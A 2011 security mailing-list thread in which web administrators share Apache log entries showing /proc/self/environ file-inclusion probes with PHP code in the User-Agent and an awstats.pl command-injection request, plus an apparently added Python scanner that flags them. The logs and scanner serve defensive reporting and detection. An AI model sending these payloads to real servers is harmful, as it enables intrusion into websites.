anyone else seeing an uptick in php attacks related to CVE-2010-2122


Bob Stangarone

Dec 13, 2011, 2:02:46 PM
to SANS Internet Storm Center / DShield
Hello all,

I've been seeing a ton of the following types of events in my apache
logs over the last few days:

[root@webserver httpd]# grep '/proc/self' * | more
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:54 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:54 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:55 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:55 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:09 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:10 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:10 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:11 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:27 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:28 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:29 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:33 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:13 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:13 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:14 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:14 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:48 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:51 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:53 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:55 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:08 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:24 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:24 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:25 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:25 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - - [12/Dec/2011:13:16:15 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - - [12/Dec/2011:13:16:16 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - - [12/Dec/2011:13:16:16 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - - [12/Dec/2011:13:16:17 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:02 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:05 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:06 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:14 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:14 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:15 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:15 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"

This is the first time I've seen these types of events in my logs.

After a bit of Google searching, I stumbled upon the following URL:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2122

Has anyone else noticed an increase in these types of events in their
logs?

Thanks,

Bob

Richard H. Fifarek

Dec 13, 2011, 2:46:08 PM
to iscds...@googlegroups.com
Yes, definitely seen an increase in these kinds of attacks on our
systems lately. Also seeing an increase in awstats.pl attacks
similar to:

"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1"

Both of these have been around for quite a while; not sure of the reason
for the increase.


--
Richard H. Fifarek
rfif...@gmail.com
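A defender-side check for both patterns in this thread: the /proc/self/environ traversal entries in Bob's grep output (note that the scanner rotates the parameter name, so the check keys on the value, not the name) and the awstats.pl configdir line Richard quotes. This is an added example, not code from either poster; the log lines and hostnames inside it are constructed to match the shape of the quoted entries.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in the same shape as the entries quoted in the
# thread; the hostnames are placeholders, not those from the original post.
SAMPLE_LOG = r"""access_log:host-a.example - - [11/Dec/2011:07:26:54 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-" "<?php system(\"id\"); ?>"
access_log:host-a.example - - [11/Dec/2011:07:26:55 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:host-b.example - - [12/Dec/2011:09:00:01 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 512 "-" "Mozilla/5.0"
access_log:host-c.example - - [12/Dec/2011:09:05:12 -0800] "GET /index.php?page=about HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

# Apache combined format, optionally prefixed with "<file>:" as grep prints it.
LINE_RE = re.compile(
    r'^(?:[^:\s]+:)?(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>(?:[^"\\]|\\.)*)"$')

def traversal_params(path):
    """Names of query parameters whose value climbs into /proc/self/environ."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return sorted(k for k, vals in query.items()
                  if any('../' in v and 'proc/self/environ' in v for v in vals))

def classify(entry):
    """Tag one parsed entry with the indicators seen in the thread."""
    path = unquote(entry['path'])          # %00 -> NUL, %20 -> space
    tags = []
    if traversal_params(entry['path']):
        tags.append('lfi-proc-self-environ')
    if '\x00' in path:
        tags.append('null-byte-truncation')
    if '<?php' in entry['ua']:             # code planted in environ via the UA header
        tags.append('php-in-user-agent')
    if 'awstats.pl' in path and 'configdir=|' in path:
        tags.append('awstats-configdir-injection')
    return tags

def scan(log_text):
    """Return flagged entries as (host, status, traversal params, tags)."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue
        entry = m.groupdict()
        tags = classify(entry)
        if tags:
            hits.append((entry['host'], int(entry['status']), traversal_params(entry['path']), tags))
    return hits
```

A 200 with the same byte count on every parameter name, as in Bob's output, means the front page simply ignored the parameter; a differing size on the traversal request is the line worth pulling the full response for.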

Ray S

Dec 13, 2011, 5:23:47 PM
to iscds...@googlegroups.com

I also have seen an increase in awstats attempts during the last week; it seems to have gone back to normal levels.
